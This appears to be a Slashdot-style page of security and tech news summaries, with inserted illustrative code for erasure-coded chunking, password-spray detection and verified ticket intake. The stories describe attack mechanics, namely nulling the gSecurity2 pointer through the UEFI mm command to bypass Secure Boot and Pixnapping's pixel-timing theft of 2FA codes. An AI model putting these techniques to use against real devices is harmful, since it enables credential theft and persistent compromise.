Interest in tech unions is at an all-time high. Groups such as Tech Solidarity and the Tech Workers Coalition are doing a land-office business, and copies of Ethan Marcotte's You Deserve a Tech Union are flying off the shelves. Now is the time to get organized. Your boss has made it clear how you'd be treated if they had their way. They're about to get it.

Thanks to long-time Slashdot reader theodp for sharing the article.
Encryption

Why Signal's Post-Quantum Makeover Is An Amazing Engineering Achievement (arstechnica.com) 26

"Eleven days ago, the nonprofit entity that develops the protocol, Signal Messenger LLC, published a 5,900-word write-up describing its latest updates that bring Signal a significant step toward being fully quantum-resistant," writes Ars Technica: The mechanism that has made this constant key evolution possible over the past decade is what protocol developers call a "double ratchet." Just as a traditional ratchet allows a gear to rotate in one direction but not in the other, the Signal ratchets allow messaging parties to create new keys based on a combination of preceding and newly agreed-upon secrets. The ratchets work in a single direction, the sending and receiving of future messages. Even if an adversary compromises a newly created secret, messages encrypted using older secrets can't be decrypted... [Signal developers describe a "ping-pong" behavior as parties take turns replacing ratchet key pairs one at a time.] Even though the ping-ponging keys are vulnerable to future quantum attacks, they are broadly believed to be secure against today's attacks from classical computers.

The Signal Protocol developers didn't want to remove them or the battle-tested code that produces them. That led to their decision to add quantum resistance by adding a third ratchet. This one uses a quantum-safe Key-Encapsulation Mechanism (KEM) to produce new secrets much like the Diffie-Hellman ratchet did before, ensuring quantum-safe, post-compromise security... The technical challenges were anything but easy. Elliptic curve keys generated in the X25519 implementation are about 32 bytes long, small enough to be added to each message without creating a burden on already constrained bandwidths or computing resources. An ML-KEM 768 key, by contrast, is 1,000 bytes. Additionally, Signal's design requires sending both an encryption key and a ciphertext, making the total size 2,272 bytes... To manage the asynchrony challenges, the developers turned to "erasure codes," a method of breaking up larger data into smaller pieces such that the original can be reconstructed using any sufficiently sized subset of chunks...

The Signal engineers have given this third ratchet the formal name: Sparse Post Quantum Ratchet, or SPQR for short. The third ratchet was designed in collaboration with PQShield, AIST, and New York University. The developers presented the erasure-code-based chunking and the high-level Triple Ratchet design at the Eurocrypt 2025 conference. Outside researchers are applauding the work. "If the normal encrypted messages we use are cats, then post-quantum ciphertexts are elephants," Matt Green, a cryptography expert at Johns Hopkins University, wrote in an interview. "So the problem here is to sneak an elephant through a tunnel designed for cats. And that's an amazing engineering achievement. But it also makes me wish we didn't have to deal with elephants."

Thanks to long-time Slashdot reader mspohr for sharing the article.
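
The erasure-code chunking the article describes, as an added illustration that is not Signal's code and does not reproduce Signal's actual parameters: a systematic Reed-Solomon-style code over the prime field GF(257) splits a constructed stand-in for a large post-quantum payload into n chunks, of which any k are enough to rebuild the original. The payload bytes, k and n are constructed assumptions.

```python
"""Erasure-coded chunking of a large payload: any k of n chunks rebuild it.

Added example, not Signal's implementation. For each k-byte block, the k
data bytes are taken as the values of a degree-(k-1) polynomial at
x = 0..k-1; parity chunks are that polynomial evaluated at x = k..n-1.
All arithmetic is in GF(257), so every byte 0..255 is a field element.
"""

P = 257  # prime modulus


def lagrange_at(points, x0):
    """Evaluate the unique polynomial of degree <= len(points)-1 that
    passes through `points` (distinct x) at x0, mod P."""
    total = 0
    for i, (xi, yi) in enumerate(points):
        num = den = 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (x0 - xj) % P
                den = den * (xi - xj) % P
        total = (total + yi * num * pow(den, P - 2, P)) % P
    return total


def make_chunks(payload: bytes, k: int, n: int) -> dict:
    """Split `payload` into n chunks (chunk index -> list of symbols).
    Chunks 0..k-1 carry the data itself, chunks k..n-1 carry parity.
    Parity symbols are field elements (0..256), so they are kept as ints."""
    if not 1 <= k <= n <= P:
        raise ValueError("need 1 <= k <= n <= 257")
    padded = payload + bytes(-len(payload) % k)  # zero-pad the last block
    chunks = {x: [] for x in range(n)}
    for start in range(0, len(padded), k):
        block = padded[start:start + k]
        points = list(enumerate(block))  # (x, byte) for x = 0..k-1
        for x in range(n):
            chunks[x].append(lagrange_at(points, x))
    return chunks


def reconstruct(received: dict, k: int, length: int) -> bytes:
    """Rebuild the first `length` payload bytes from any k received chunks."""
    if len(received) < k:
        raise ValueError(f"need {k} chunks, have {len(received)}")
    xs = sorted(received)[:k]
    n_blocks = len(received[xs[0]])
    out = bytearray()
    for b in range(n_blocks):
        points = [(x, received[x][b]) for x in xs]
        for x0 in range(k):             # data positions are x = 0..k-1
            out.append(lagrange_at(points, x0))
    return bytes(out[:length])


def demo() -> bool:
    # Constructed stand-in for a 2,272-byte PQ payload (not a real ML-KEM key).
    payload = bytes((i * 7 + 3) % 256 for i in range(2272))
    k, n = 8, 12                      # any 8 of 12 chunks suffice
    chunks = make_chunks(payload, k, n)
    # Simulate four chunks lost in transit; the remaining eight are enough.
    survivors = {x: chunks[x] for x in (1, 2, 4, 6, 8, 9, 10, 11)}
    return reconstruct(survivors, k, len(payload)) == payload


if __name__ == "__main__":
    print("reconstructed OK:", demo())
```

The receiver needs no knowledge of which chunks were lost, only that at least k distinct ones arrived; that is what lets the sender spread a large key across many messages without waiting for acknowledgements.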
Microsoft

Extortion and Ransomware Drive Over Half of Cyberattacks — Sometimes Using AI, Microsoft Finds (microsoft.com) 23

Microsoft said in a blog post this week that "over half of cyberattacks with known motives were driven by extortion or ransomware... while attacks focused solely on espionage made up just 4%."

And Microsoft's annual digital threats report found operations expanding even more through AI, with cybercriminals "accelerating malware development and creating more realistic synthetic content, enhancing the efficiency of activities such as phishing and ransomware attacks." [L]egacy security measures are no longer enough; we need modern defenses leveraging AI and strong collaboration across industries and governments to keep pace with the threat...

Over the past year, both attackers and defenders harnessed the power of generative AI. Threat actors are using AI to boost their attacks by automating phishing, scaling social engineering, creating synthetic media, finding vulnerabilities faster, and creating malware that can adapt itself... For defenders, AI is also proving to be a valuable tool. Microsoft, for example, uses AI to spot threats, close detection gaps, catch phishing attempts, and protect vulnerable users. As both the risks and opportunities of AI rapidly evolve, organizations must prioritize securing their AI tools and training their teams...

Amid the growing sophistication of cyber threats, one statistic stands out: more than 97% of identity attacks are password attacks. In the first half of 2025 alone, identity-based attacks surged by 32%. That means the vast majority of malicious sign-in attempts an organization might receive are via large-scale password guessing attempts. Attackers get usernames and passwords ("credentials") for these bulk attacks largely from credential leaks. However, credential leaks aren't the only place where attackers can obtain credentials. This year, we saw a surge in the use of infostealer malware by cybercriminals...

Luckily, the solution to identity compromise is simple. The implementation of phishing-resistant multifactor authentication (MFA) can stop over 99% of this type of attack even if the attacker has the correct username and password combination.

"Security is not only a technical challenge but a governance imperative..." Microsoft adds in their blog post. "Governments must build frameworks that signal credible and proportionate consequences for malicious activity that violates international rules." (The report also found that America is the #1 most-targeted country — and that many U.S. companies have outdated cyber defenses.)

But while "most of the immediate attacks organizations face today come from opportunistic criminals looking to make a profit," Microsoft writes that nation-state threats "remain a serious and persistent threat." More details from the Associated Press: Russia, China, Iran and North Korea have sharply increased their use of artificial intelligence to deceive people online and mount cyberattacks against the United States, according to new research from Microsoft. This July, the company identified more than 200 instances of foreign adversaries using AI to create fake content online, more than double the number from July 2024 and more than ten times the number seen in 2023.
Examples of foreign espionage cited by the article:
  • China is continuing its broad push across industries to conduct espionage and steal sensitive data...
  • Iran is going after a wider range of targets than ever before, from the Middle East to North America, as part of broadening espionage operations...
  • "[O]utside of Ukraine, the top ten countries most affected by Russian cyber activity all belong to the North Atlantic Treaty Organization (NATO) — a 25% increase compared to last year."
  • North Korea remains focused on revenue generation and espionage...

There was one especially worrying finding. The report found that critical public services are often targeted, partly because their tight budgets limit their incident response capabilities, "often resulting in outdated software.... Ransomware actors in particular focus on these critical sectors because of the targets' limited options. For example, a hospital must quickly resolve its encrypted systems, or patients could die, potentially leaving no other recourse but to pay."
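
Detection logic for the bulk password-guessing pattern the report describes (the "vast majority" of identity attacks), as an added example that is not Microsoft's code or its sign-in analytics, run over a few constructed sign-in log lines: a source that fails against many distinct accounts in a short window is flagged as password spraying, a single account hammered from one source as brute force, and any success from a flagged source is reported as the credential the guessing found. The log format, thresholds and IP/user values are assumptions.

```python
"""Flag password spraying and brute force in sign-in logs (added example).

Not Microsoft's detection logic. Log line format is a constructed
assumption:  <ISO-8601 timestamp> <source_ip> <user> <SUCCESS|FAILURE>
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: 203.0.113.5 tries one guess against many accounts
# (spray) and then succeeds for one of them; 198.51.100.9 hammers a single
# account (brute force); 192.0.2.7 is a user who mistyped once.
SAMPLE_LOG = """\
2025-10-16T09:00:01Z 203.0.113.5 alice FAILURE
2025-10-16T09:00:02Z 203.0.113.5 bob FAILURE
2025-10-16T09:00:03Z 203.0.113.5 carol FAILURE
2025-10-16T09:00:04Z 203.0.113.5 dave FAILURE
2025-10-16T09:00:05Z 203.0.113.5 erin FAILURE
2025-10-16T09:00:06Z 203.0.113.5 frank SUCCESS
2025-10-16T09:01:00Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:01Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:02Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:03Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:04Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:05Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:06Z 198.51.100.9 alice FAILURE
2025-10-16T09:01:07Z 198.51.100.9 alice FAILURE
2025-10-16T09:02:00Z 192.0.2.7 grace FAILURE
2025-10-16T09:02:30Z 192.0.2.7 grace SUCCESS
"""


def parse(log_text: str) -> list:
    """Turn log lines into (timestamp, ip, user, result) tuples."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, ip, user, result = line.split()
        events.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), ip, user, result))
    return events


def detect(events, window=timedelta(minutes=10), spray_users=5, brute_attempts=8) -> dict:
    """Return {source_ip: findings} for sources that look like a spray
    (>= spray_users distinct accounts failing within `window`) or brute
    force (>= brute_attempts failures on one account within `window`)."""
    events = sorted(events)
    failures = defaultdict(list)   # ip -> [(ts, user)]
    successes = defaultdict(set)   # ip -> {user}
    for ts, ip, user, result in events:
        if result == "FAILURE":
            failures[ip].append((ts, user))
        else:
            successes[ip].add(user)

    findings = {}
    for ip, fails in failures.items():
        sprayed, hammered = set(), set()
        start = 0
        for end in range(len(fails)):
            # Slide the window: drop failures older than `window` before the newest.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            per_user = defaultdict(int)
            for _, u in fails[start:end + 1]:
                per_user[u] += 1
            if len(per_user) >= spray_users:
                sprayed.update(per_user)
            hammered.update(u for u, c in per_user.items() if c >= brute_attempts)
        if not (sprayed or hammered):
            continue
        entry = {}
        if sprayed:
            entry["password_spray"] = sorted(sprayed)
        if hammered:
            entry["brute_force"] = sorted(hammered)
        # A success from a source that was guessing is the account to act on;
        # phishing-resistant MFA is what turns this success into a failure.
        hits = sorted(successes.get(ip, ()))
        if hits:
            entry["success_after_failures"] = hits
        findings[ip] = entry
    return findings


if __name__ == "__main__":
    for ip, entry in detect(parse(SAMPLE_LOG)).items():
        print(ip, entry)
```

Thresholds are deliberately conservative here; in production they are tuned per tenant, and the same sliding-window logic is usually keyed on an ASN or user-agent as well as the source address, because sprays are spread across many addresses.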


Cellphones

You Only Need $750 to Pilfer Unencrypted Data From Satellites, Researchers Say (gizmodo.com) 20

"A new study published on Monday found that communications from cellphone carriers, retailers, banks, and even militaries are being broadcast unencrypted through geostationary satellites..." reports Gizmodo. "The team obtained unencrypted internet communications from U.S. military sea vessels and even communications regarding narcotics trafficking from Mexican military and law enforcement." Researchers from the University of California, San Diego (UCSD) and the University of Maryland scanned 39 of these satellites from a rooftop in Southern California over three years. They found that roughly half of the signals they analyzed were transmitting unencrypted data, potentially exposing everything from phone calls and military logistics to a retail chain's inventory. "There is a clear mismatch between how satellite customers expect data to be secured and how it is secured in practice," the researchers wrote in their paper titled "Don't Look Up: There Are Sensitive Internal Links in the Clear on GEO Satellites...." "They assumed that no one was ever going to check and scan all these satellites and see what was out there. That was their method of security," Aaron Schulman, a UCSD professor and co-lead of the study, told Wired....

Even more surprisingly, the researchers didn't need any fancy spy gear to collect this data. Their setup used only off-the-shelf hardware, including a $185 satellite dish, a $140 roof mount with a $195 motor, and a $230 tuner card. Altogether, the system cost roughly $750 and was installed on a university building in La Jolla, San Diego.

With their simple setup, the researchers were able to collect a wide range of communication data, including phone calls, texts, in-flight Wi-Fi data from airline passengers, and signals from electric utilities. They even obtained U.S. and Mexican military and law enforcement communications, as well as ATM transactions and corporate communications... When it came to telecoms, specifically, the team collected phone numbers, calls, and texts from customers of T-Mobile, AT&T Mexico, and Telmex... It only took the team nine hours to collect the phone numbers of over 2,700 T-Mobile users, along with some of their calls and text messages.

T-Mobile told Gizmodo the lack of encryption was "a vendor's technical misconfiguration" affecting "a limited number of cell sites" and was "not network-wide... [W]e implemented nationwide Session Initiation Protocol (SIP) encryption for all customers to further protect signaling traffic as it travels between mobile handsets and the network core, including call set up, numbers dialed and text message content. We appreciate our collaboration with the security research community, whose work helps reinforce our ongoing commitment to protecting customer data and enhances security across the industry."

Indeed, the researchers write that "Each time we discovered sensitive information in our data, we went through considerable effort to determine the responsible party, establish contact, and disclose the vulnerability. In several cases, the responsible party told us that they had deployed a remedy. For the following parties, we re-scanned with their permission and were able to verify a remedy had been deployed: T-Mobile, WalMart, and KPU."

The researchers acknowledge that exposure "was limited to a relatively small number of cell towers in specific remote areas."
Security

Email Bombs Exploit Lax Authentication In Zendesk (krebsonsecurity.com) 11

Cybercriminals are exploiting weak email authentication settings in Zendesk, using the platform's customer support systems to bombard targets with thousands of spam and harassing messages that appear to come from legitimate companies like The Washington Post, Discord, and NordVPN. KrebsOnSecurity reports: Zendesk is an automated help desk service designed to make it simple for people to contact companies for customer support issues. Earlier this week, KrebsOnSecurity started receiving thousands of ticket creation notification messages through Zendesk in rapid succession, each bearing the name of different Zendesk customers, such as CapCom, CompTIA, Discord, GMAC, NordVPN, The Washington Post, and Tinder.

The abusive missives sent via Zendesk's platform can include any subject line chosen by the abusers. In my case, the messages variously warned about a supposed law enforcement investigation involving KrebsOnSecurity.com, or else contained personal insults. Moreover, the automated messages that are sent out from this type of abuse all come from customer domain names -- not from Zendesk. [...]

In all of the cases above, the messaging abuse would not have been possible if Zendesk customers validated support request email addresses prior to sending responses. Failing to do so may make it easier for Zendesk clients to handle customer support requests, but it also allows ne'er-do-wells to sully the sender's brand in service of disruptive and malicious email floods.
"We recognize that our systems were leveraged against you in a distributed, many-against-one manner," said Carolyn Camoens, communications director at Zendesk. "We are actively investigating additional preventive measures. We are also advising customers experiencing this type of activity to follow our general security best practices and configure an authenticated ticket creation workflow."
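
One shape of the "authenticated ticket creation workflow" referred to above, as an added example that is neither Zendesk's code nor its actual configuration: a request from an unverified address produces only a fixed-wording verification message carrying a random token, the requester-chosen subject is emitted only after that token is confirmed, and outstanding verifications per address are capped so that a flood aimed at one recipient yields at most a handful of neutral messages. The class, method names, token scheme and limits are assumptions.

```python
"""Verify the requester address before sending requester-chosen content.

Added example; not Zendesk's code or settings. An unverified requester
receives only a fixed-wording verification message, and the ticket (with
its requester-chosen subject) exists only once the token comes back.
"""
import secrets
import time


class TicketIntake:
    VERIFY_SUBJECT = "Please confirm your support request"  # fixed wording
    TOKEN_TTL = 3600              # seconds a verification token stays valid
    MAX_PENDING_PER_ADDRESS = 3   # cap on outstanding verifications per recipient

    def __init__(self, now=time.time):
        self._now = now           # injectable clock for testing
        self.pending = {}         # token -> (email, subject, body, expires_at)
        self.tickets = []         # created tickets
        self.outbox = []          # (to, subject, body) messages "sent"
        self.verified = set()     # addresses that already proved ownership

    def request_ticket(self, email: str, subject: str, body: str) -> dict:
        """Entry point for an inbound support request (web form or e-mail)."""
        if email in self.verified:
            return self._create(email, subject, body)
        self._expire()
        outstanding = sum(1 for (e, *_rest) in self.pending.values() if e == email)
        if outstanding >= self.MAX_PENDING_PER_ADDRESS:
            # Refuse to send yet another message to an address that never confirms.
            return {"status": "suppressed", "reason": "too many unverified requests"}
        token = secrets.token_urlsafe(32)
        self.pending[token] = (email, subject, body, self._now() + self.TOKEN_TTL)
        # Nothing the requester typed is echoed in this message.
        self.outbox.append((email, self.VERIFY_SUBJECT,
                            f"Reply with this code to open your request: {token}"))
        return {"status": "pending_verification"}

    def confirm(self, token: str) -> dict:
        """Called when the recipient sends the token back."""
        self._expire()
        entry = self.pending.pop(token, None)
        if entry is None:
            return {"status": "rejected", "reason": "unknown or expired token"}
        email, subject, body, _expires = entry
        self.verified.add(email)
        return self._create(email, subject, body)

    def _create(self, email: str, subject: str, body: str) -> dict:
        ticket_id = len(self.tickets) + 1
        self.tickets.append({"id": ticket_id, "requester": email,
                             "subject": subject, "body": body})
        # Only now does the requester-chosen subject reach the mailbox.
        self.outbox.append((email, f"[Ticket #{ticket_id}] {subject}",
                            "We received your request."))
        return {"status": "created", "ticket_id": ticket_id}

    def _expire(self) -> None:
        now = self._now()
        for tok in [t for t, (_, _, _, exp) in self.pending.items() if exp <= now]:
            del self.pending[tok]
```

The cap and the fixed verification wording are the two controls that matter for the many-against-one case: without the cap a flood still produces one message per forged request, and without fixed wording the verification message itself becomes the vehicle for the abuser's chosen text.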
Privacy

Prosper Data Breach Impacts 17.6 Million Accounts (bleepingcomputer.com) 4

Hackers breached financial services firm Prosper, stealing the personal data of roughly 17.6 million people, including Social Security numbers, income details, and government IDs. "We have evidence that confidential, proprietary, and personal information, including Social Security Numbers, was obtained, including through unauthorized queries made on Company databases that store customer information and applicant data. We will be offering free credit monitoring as appropriate after we determine what data was affected," the company says. "The investigation is still in its very early stages, but resolving this incident is our top priority and we are committed to sharing additional information with our customers as appropriate." BleepingComputer reports: Prosper operates as a peer-to-peer lending marketplace that has helped over 2 million customers secure more than $30 billion in loans since its founding in 2005. As the company disclosed one month ago on a dedicated page, the breach was detected on September 2, but Prosper has yet to find evidence that the attackers gained access to customer accounts and funds.

However, the attackers stole data belonging to Prosper customers and loan applicants. The company hasn't shared what information was exposed beyond Social Security numbers because it's still investigating what data was affected. Prosper added that the security breach didn't impact its customer-facing operations and that it has reported the incident to relevant authorities and is collaborating with law enforcement to investigate the attack. [...] The stolen information also includes customers' names, government-issued IDs, employment status, credit status, income levels, dates of birth, physical addresses, IP addresses, and browser user agent details.
Have I Been Pwned revealed the extent of the incident on Thursday.
Data Storage

12 Years of HDD Analysis Brings Insight To the Bathtub Curve's Reliability (arstechnica.com) 23

Backblaze has been tracking hard disk drive failures in its datacenter since 2013. The backup and cloud storage company's latest analysis of approximately 317,230 drives shows that peak failure rates have dropped dramatically and shifted much later in a drive's lifespan. Where the company once saw failure rates of 13.73% at around three years in 2013 and 14.24% at seven years and nine months in 2021, the current data shows a peak of just 4.25% at 10 years and three months.

This represents the first time the company has observed the highest failure rate occurring at the far end of the drive curve rather than earlier in its operational life, it said. The drives maintained relatively consistent failure rates through most of their use before spiking sharply near the end. The improvement amounts to roughly one-third of the previous peak failure rates.
Security

F5 Says Hackers Stole Undisclosed BIG-IP Flaws, Source Code (bleepingcomputer.com) 16

An anonymous reader quotes a report from BleepingComputer: U.S. cybersecurity company F5 disclosed that nation-state hackers breached its systems and stole undisclosed BIG-IP security vulnerabilities and source code. The company states that it first became aware of the breach on August 9, 2025, with its investigations revealing that the attackers had gained long-term access to its system, including the company's BIG-IP product development environment and engineering knowledge management platform.

F5 is a Fortune 500 tech giant specializing in cybersecurity, cloud management, and application delivery networking (ADN) applications. The company has 23,000 customers in 170 countries, and 48 of the Fortune 50 entities use its products. BIG-IP is the firm's flagship product used for application delivery and traffic management by many large enterprises worldwide. [...]

F5 is still reviewing which customers had their configuration or implementation details stolen and will contact them with guidance. To help customers secure their F5 environments against risks stemming from the breach, the company released updates for BIG-IP, F5OS, BIG-IP Next for Kubernetes, BIG-IQ, and APM clients. Despite having found no evidence "of undisclosed critical or remote code execution vulnerabilities," the company urges customers to prioritize installing the new BIG-IP software updates.

Security

Secure Boot Bypass Risk Threatens Nearly 200,000 Linux Framework Laptops (bleepingcomputer.com) 63

Roughly 200,000 Linux-based Framework laptops shipped with a signed UEFI shell command (mm) that can be abused to bypass Secure Boot protections -- allowing attackers to load persistent bootkits like BlackLotus or HybridPetya. Framework has begun patching affected models, though some fixes and DBX updates are still pending. BleepingComputer reports: According to firmware security company Eclypsium, the problem stems from including a 'memory modify' (mm) command in legitimately signed UEFI shells that Framework shipped with its systems. The command provides direct read/write access to system memory and is intended for low-level diagnostics and firmware debugging. However, it can also be leveraged to break the Secure Boot trust chain by targeting the gSecurity2 variable, a critical component in the process of verifying the signatures of UEFI modules.

The mm command can be abused to overwrite gSecurity2 with NULL, effectively disabling signature verification. "This command writes zeros to the memory location containing the security handler pointer, effectively disabling signature verification for all subsequent module loads." The researchers also note that the attack can be automated via startup scripts to persist across reboots.

AI

Are AI Agents Compromised By Design? 38

Longtime Slashdot reader Gadi Evron writes: Bruce Schneier and Barath Raghavan say agentic AI is already broken at the core. In their IEEE Security & Privacy essay, they argue that AI agents run on untrusted data, use unverified tools, and make decisions in hostile environments. Every part of the OODA loop (observe, orient, decide, act) is open to attack. Prompt injection, data poisoning, and tool misuse corrupt the system from the inside. The model's strength, treating all input as equal, also makes it exploitable. They call this the AI security trilemma: fast, smart, or secure. Pick two. Integrity isn't a feature you bolt on later. It has to be built in from the start. "Computer security has evolved over the decades," the authors wrote. "We addressed availability despite failures through replication and decentralization. We addressed confidentiality despite breaches using authenticated encryption. Now we need to address integrity despite corruption."

"Trustworthy AI agents require integrity because we can't build reliable systems on unreliable foundations. The question isn't whether we can add integrity to AI but whether the architecture permits integrity at all."
Microsoft

Beijing Issues Documents Without Word Format Amid US Tensions (scmp.com) 146

An anonymous reader shares a report: China's expansion of its rare earth export controls appeared to mark another escalation in the US-China trade war last week. But the announcements were also significant in another way: unusually, the documents could not be opened using American word processing software.

For the first time, China's Ministry of Commerce issued a slew of documents that could be directly accessed only through WPS Office -- China's answer to Microsoft Office -- as Beijing continues its tech self-reliance drive. Developed by the Beijing-based software company Kingsoft, WPS Office uses a different coding structure to Microsoft Office, meaning WPS text files cannot be opened directly in Word without conversion. Previously, the ministry primarily released text documents in Microsoft Word format.

Privacy

ShinyHunters Leak Alleged Data From Qantas, Vietnam Airlines and Other Major Firms (hackread.com) 14

schwit1 shares a report from Hackread: On October 3, 2025, Hackread.com published an in-depth report in which hackers claimed to have stolen 989 million records from 39 major companies worldwide by exploiting a Salesforce vulnerability. The group demanded that Salesforce and the affected firms enter negotiations before October 10, 2025, warning that if their demands were ignored, they would release the entire dataset. The hackers, identifying themselves as "Scattered Lapsus$ Hunters," a collective said to combine elements of Scattered Spider, Lapsus$, and ShinyHunters, have now published data allegedly belonging to 6 of the 39 targeted companies.

The companies named in the leak are as follows: Fujifilm, GAP, INC., Vietnam Airlines, Engie Resources, Qantas Airways Limited, and Albertsons Companies, Inc. In all 6 leaks, the records contain personal details of customers and businesses, including email addresses, full names, addresses, passport numbers, and phone numbers.
The hackers said on Telegram that they will not be releasing any additional information, stating, "A lot of people are asking what else will be leaked. Nothing else will be leaked. Everything that was leaked was leaked, we have nothing else to leak, and obviously, the things we have cannot be leaked for obvious reasons."
Android

Android 'Pixnapping' Attack Can Capture App Data Like 2FA Codes (theregister.com) 17

An anonymous reader quotes a report from The Register: Security researchers have resurrected a 12-year-old data-stealing attack on web browsers to pilfer sensitive info from Android devices. The attack, dubbed Pixnapping, has yet to be mitigated. Conceptually, it's the equivalent of a malicious Android app being able to screenshot other apps or websites. It allows a malicious Android application to access and leak information displayed in other Android apps or on websites. It can, for example, steal data displayed in apps like Google Maps, Signal, and Venmo, as well as from websites like Gmail (mail.google.com). It can even steal 2FA codes from Google Authenticator.

"First, the malicious app opens the target app (e.g., Google Authenticator), submitting its pixels for rendering," explained [Alan Wang, a PhD candidate at UC Berkeley]. "Second, the malicious app picks the coordinates of a target pixel whose color it wants to steal. Suppose for example it wants to steal a pixel that is part of the screen region where a 2FA character is known to be rendered by Google Authenticator, and that this pixel is either white (if nothing was rendered there) or non-white (if part of a 2FA digit was rendered there). Third, the malicious app causes some graphical operations whose rendering time is long if the target pixel is non-white and short if it is white. The malicious app does this by opening some malicious activities (i.e., windows) in front of the target app. Finally, the malicious app measures the rendering time per frame of the above graphical operations to determine whether the target pixel was white or non-white. These last few steps are repeated for as many pixels as needed to run OCR over the recovered pixels and guess the original content."

The researchers have demonstrated Pixnapping on five devices running Android versions 13 to 16 (up until build id BP3A.250905.014): Google Pixel 6, Google Pixel 7, Google Pixel 8, Google Pixel 9, and Samsung Galaxy S25. Android 16 is the latest operating system version. Other Android devices have not been tested, but the mechanism that allows the attack to work is typically available. A malicious Android app implementing Pixnapping would not require any special permissions in its manifest file, the authors say.
The researchers detail the attack in a paper (PDF) titled "Pixnapping: Bringing Pixel Stealing out of the Stone Age."
Businesses

Toxic Workplaces Are Worsening: 80% of U.S. Workers Say Their Job Hurts Mental Health (fastcompany.com) 187

Slashdot reader joshuark shared this report from Fast Company: According to Monster's newly released 2025 Mental Health in the Workplace survey of 1,100 workers, 80% of respondents described their workplace environment as toxic. The alarming statistic is an increase from 67% just a year ago.

The challenging environment has major implications. An astonishing 71% of workers say their mental health is poor (40%) or fair (31%), while only 29% rank it positively: 20% said it was good and 9% described it as great. Workers say that a toxic workplace culture is the top cause of their poor mental health (59%), followed closely by having a bad manager (54%)...

Mental health is incredibly important to employees. The majority (63%) care more about it than having a "brag-worthy" job. Likewise, many would pass on a promotion (43%) or opt out of a raise (33%) if it was better for their mental health... The vast majority (93%) say their employer isn't focused on supporting employee mental health — a statistic that rose drastically since just a year ago, with 78% claiming the same.

"According to the survey, more than half of workers (57%) say they'd rather quit their job than continue working in an environment they feel is toxic and overall, causing major strains to their mental wellbeing..."
AI

AI Slop? Not This Time. AI Tools Found 50 Real Bugs In cURL (theregister.com) 92

The Register reports: Over the past two years, the open source curl project has been flooded with bogus bug reports generated by AI models. The deluge prompted project maintainer Daniel Stenberg to publish several blog posts about the issue in an effort to convince bug bounty hunters to show some restraint and not waste contributors' time with invalid issues. Shoddy AI-generated bug reports have been a problem not just for curl, but also for the Python community, Open Collective, and the Mesa Project.

It turns out the problem is people rather than technology. Last month, the curl project received dozens of potential issues from Joshua Rogers, a security researcher based in Poland. Rogers identified assorted bugs and vulnerabilities with the help of various AI scanning tools. And his reports were not only valid but appreciated. Stenberg in a Mastodon post last month remarked, "Actually truly awesome findings." In his mailing list update last week, Stenberg said, "most of them were tiny mistakes and nits in ordinary static code analyzer style, but they were still mistakes that we are better off having addressed. Several of the found issues were quite impressive findings...."

Stenberg told The Register that about 50 bugfixes based on Rogers' reports have been merged. "In my view, this list of issues achieved with the help of AI tooling shows that AI can be used for good," he said in an email. "Powerful tools in the hand of a clever human is certainly a good combination. It always was...!" Rogers wrote up a summary of the AI vulnerability scanning tools he tested. He concluded that these tools — Almanax, Corgea, ZeroPath, Gecko, and Amplify — are capable of finding real vulnerabilities in complex code.

The Register's conclusion? AI tools "when applied with human intelligence by someone with meaningful domain experience, can be quite helpful."

jantangring (Slashdot reader #79,804) has published an article on Stenberg's new position, including recently published comments from Stenberg that "It really looks like these new tools are finding problems that none of the old, established tools detect."
Encryption

Cryptologist DJB Alleges NSA is Pushing an End to Backup Algorithms for Post-Quantum Cryptography (cr.yp.to) 38

Cryptologist/CS professor Daniel J. Bernstein is alleging that America's National Security Agency is attempting to influence NIST post-quantum cryptography standards.

Bernstein first emphasizes that it's normal for post-quantum cryptography (or "PQ") to be part of "hybrid" security that also includes traditional pre-quantum cryptography. (Bernstein says this is important because since 2016, "We've seen many breaks of post-quantum proposals...")

"The problem in a nutshell. Surveillance agency NSA and its [UK counterpart] GCHQ are trying to have standards-development organizations endorse weakening [pre-quantum] ECC+PQ down to just PQ." Part of this is that NSA and GCHQ have been endlessly repeating arguments that this weakening is a good thing... I'm instead looking at how easy it is for NSA to simply spend money to corrupt the standardization process.... The massive U.S. military budget now publicly requires cryptographic "components" to have NSA approval... In June 2024, NSA's William Layton wrote that "we do not anticipate supporting hybrid in national security systems"...

[Later a Cisco employee wrote of selling non-hybrid cryptography to a significant customer, "that's what they're willing to buy. Hence, Cisco will implement it".]

What do you do with your control over the U.S. military budget? That's another opportunity to "shape the worldwide commercial cryptography marketplace". You can tell people that you won't authorize purchasing double encryption. You can even follow through on having the military publicly purchase single encryption. Meanwhile you quietly spend a negligible amount of money on an independent encryption layer to protect the data that you care about, so you're actually using double encryption.

This seems to be a speculative scenario. But Bernstein is also concerned about how the Internet Engineering Task Force handled two drafts specifying post-quantum encryption mechanisms for TLS ("the security layer inside HTTPS and inside various other protocols"). For a draft suggesting "non-hybrid" encryption, there were 20 statements of support (plus 2 more only conditionally supporting it), but 7 more statements unequivocally opposing adoption, including one from Bernstein. The IETF has at times said they aim for "rough consensus" — or for "broad consensus" — but Bernstein insists 7 opposers in a field of 29 (24.13%) can't be said to match the legal definition of consensus (which is "general agreement"). "I've filed a formal complaint regarding the claim of consensus to adopt."

He's also written a second blog post analyzing the IETF's decision-making process in detail. "It's already bad that the IETF TLS working group adopted non-hybrid post-quantum encryption without official answers to the objections that were raised. It's much worse if the objections can't be raised in the first place."

Thanks to alanw (Slashdot reader #1,822) for spotting the blog posts.
Botnet

DDoS Botnet Aisuru Blankets US ISPs In Record DDoS (krebsonsecurity.com) 14

An anonymous reader quotes a report from KrebsOnSecurity: The world's largest and most disruptive botnet is now drawing a majority of its firepower from compromised Internet-of-Things (IoT) devices hosted on U.S. Internet providers like AT&T, Comcast and Verizon, new evidence suggests. Experts say the heavy concentration of infected devices at U.S. providers is complicating efforts to limit collateral damage from the botnet's attacks, which shattered previous records this week with a brief traffic flood that clocked in at nearly 30 trillion bits of data per second.

